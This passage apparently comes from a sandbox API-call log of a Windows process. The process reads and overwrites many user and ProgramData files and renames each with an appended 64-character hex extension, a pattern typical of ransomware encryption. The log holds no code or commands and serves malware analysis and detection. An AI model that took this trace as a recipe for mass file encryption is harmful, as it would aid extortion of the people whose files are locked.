ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x28fff70) returned 0x0 [0125.574] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\tpAYgwM4h.avi", lpString2=".5F03513EEC2E125D6D24D2BE397FCF24FC9462CA04EF54780FFE4AF4DA964775" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\tpAYgwM4h.avi.5F03513EEC2E125D6D24D2BE397FCF24FC9462CA04EF54780FFE4AF4DA964775") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\tpAYgwM4h.avi.5F03513EEC2E125D6D24D2BE397FCF24FC9462CA04EF54780FFE4AF4DA964775" [0125.574] GetProcessHeap () returned 0x600000 [0125.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x112) returned 0x31199e8 [0125.574] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x31199e8, Length=0x112, FileInformationClass=0xa) returned 0x0 [0125.575] CloseHandle (hObject=0x32c) returned 1 [0125.576] GetProcessHeap () returned 0x600000 [0125.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0125.577] GetQueuedCompletionStatus (CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff) Thread: id = 122 os_tid = 0x724 [0091.021] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0104.787] WriteFile (in: hFile=0x314, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0104.791] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0104.821] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x6b5438, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6b5438, ReturnLength=0x29fff70) returned 0x0 [0104.822] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml", lpString2=".235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml.235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml.235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41" [0104.822] GetProcessHeap () returned 0x600000 [0104.822] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x196) returned 0x63c988 [0104.822] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x29fff60, FileInformation=0x63c988, Length=0x196, FileInformationClass=0xa) returned 0x0 [0104.823] CloseHandle (hObject=0x310) returned 1 [0104.824] GetProcessHeap () returned 0x600000 [0104.825] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b5388 | out: hHeap=0x600000) returned 1 [0104.826] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0104.826] ReadFile (in: hFile=0x318, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x5200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0104.826] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0104.827] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x29fff70) returned 0x0 [0104.827] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml", lpString2=".DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml.DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml.DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D" [0104.827] GetProcessHeap () returned 0x600000 [0104.827] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19a) returned 0x63cb28 [0104.827] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x29fff60, FileInformation=0x63cb28, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0104.828] CloseHandle (hObject=0x318) returned 1 [0104.830] GetProcessHeap () returned 0x600000 [0104.830] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0104.831] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0104.837] ReadFile (in: hFile=0x318, lpBuffer=0x6d54c0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b5388 | out: lpBuffer=0x6d54c0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b5388) returned 1 [0104.837] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0104.837] WriteFile (in: hFile=0x318, lpBuffer=0x6d54c0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b5388 | out: lpBuffer=0x6d54c0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b5388) returned 1 [0104.838] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0104.838] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x6b5438, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6b5438, ReturnLength=0x29fff70) returned 0x0 [0104.839] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat", lpString2=".6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat.6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat.6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E" [0104.839] GetProcessHeap () returned 0x600000 [0104.839] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x196) returned 0x63ccd0 [0104.839] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x29fff60, FileInformation=0x63ccd0, Length=0x196, FileInformationClass=0xa) returned 0x0 [0104.839] CloseHandle (hObject=0x318) returned 1 [0104.940] GetProcessHeap () returned 0x600000 [0104.940] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b5388 | out: hHeap=0x600000) returned 1 [0104.949] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.106] WriteFile (in: hFile=0x308, lpBuffer=0x3133458*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3113320 | out: lpBuffer=0x3133458*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3113320) returned 1 [0105.107] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.845] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x29fff70) returned 0x0 [0105.845] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2=".D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19" [0105.845] GetProcessHeap () returned 0x600000 [0105.845] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a8) returned 0x30f2b10 [0105.845] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x29fff60, FileInformation=0x30f2b10, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0105.846] CloseHandle (hObject=0x308) returned 1 [0105.849] GetProcessHeap () returned 0x600000 [0105.849] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.850] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.862] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0105.863] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2=".3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439" [0105.863] GetProcessHeap () returned 0x600000 [0105.863] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a8) returned 0x6ed4e8 [0105.863] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x29fff60, FileInformation=0x6ed4e8, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0105.870] CloseHandle (hObject=0x31c) returned 1 [0105.881] GetProcessHeap () returned 0x600000 [0105.881] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0105.883] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.886] ReadFile (in: hFile=0x30c, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0105.887] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.887] WriteFile (in: hFile=0x30c, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0105.888] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.889] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x29fff70) returned 0x0 [0105.889] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2=".A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24" [0105.889] GetProcessHeap () returned 0x600000 [0105.889] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a8) returned 0x6ed698 [0105.890] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x29fff60, FileInformation=0x6ed698, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0105.891] CloseHandle (hObject=0x30c) returned 1 [0105.893] GetProcessHeap () returned 0x600000 [0105.894] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0105.896] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.925] ReadFile (in: hFile=0x30c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0105.925] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.926] WriteFile (in: hFile=0x30c, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0105.926] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.927] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x29fff70) returned 0x0 [0105.927] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml", lpString2=".8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F" [0105.928] GetProcessHeap () returned 0x600000 [0105.928] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19e) returned 0x318cbb0 [0105.928] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x29fff60, FileInformation=0x318cbb0, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0105.930] CloseHandle (hObject=0x30c) returned 1 [0105.933] GetProcessHeap () returned 0x600000 [0105.933] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.934] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0105.936] WriteFile (in: hFile=0x31c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.937] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0107.918] ReadFile (in: hFile=0x30c, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0107.930] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0108.774] ReadFile (in: hFile=0x310, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0108.774] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0108.774] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x29fff70) returned 0x0 [0108.775] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03" [0108.775] GetProcessHeap () returned 0x600000 [0108.775] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b4) returned 0x30f1110 [0108.775] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x29fff60, FileInformation=0x30f1110, Length=0x1b4, FileInformationClass=0xa) returned 0x0 [0108.777] CloseHandle (hObject=0x304) returned 1 [0109.201] GetProcessHeap () returned 0x600000 [0109.201] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0109.202] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0109.322] ReadFile (in: hFile=0x304, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0109.322] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0109.323] WriteFile (in: hFile=0x304, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0109.325] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0109.326] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x29fff70) returned 0x0 [0109.326] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E" [0109.326] GetProcessHeap () returned 0x600000 [0109.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ac) returned 0x6f2ba8 [0109.326] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x29fff60, FileInformation=0x6f2ba8, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0109.327] CloseHandle (hObject=0x304) returned 1 [0109.353] GetProcessHeap () returned 0x600000 [0109.353] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0109.354] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0109.383] ReadFile (in: hFile=0x304, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0109.384] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0109.384] WriteFile (in: hFile=0x304, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0109.385] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, 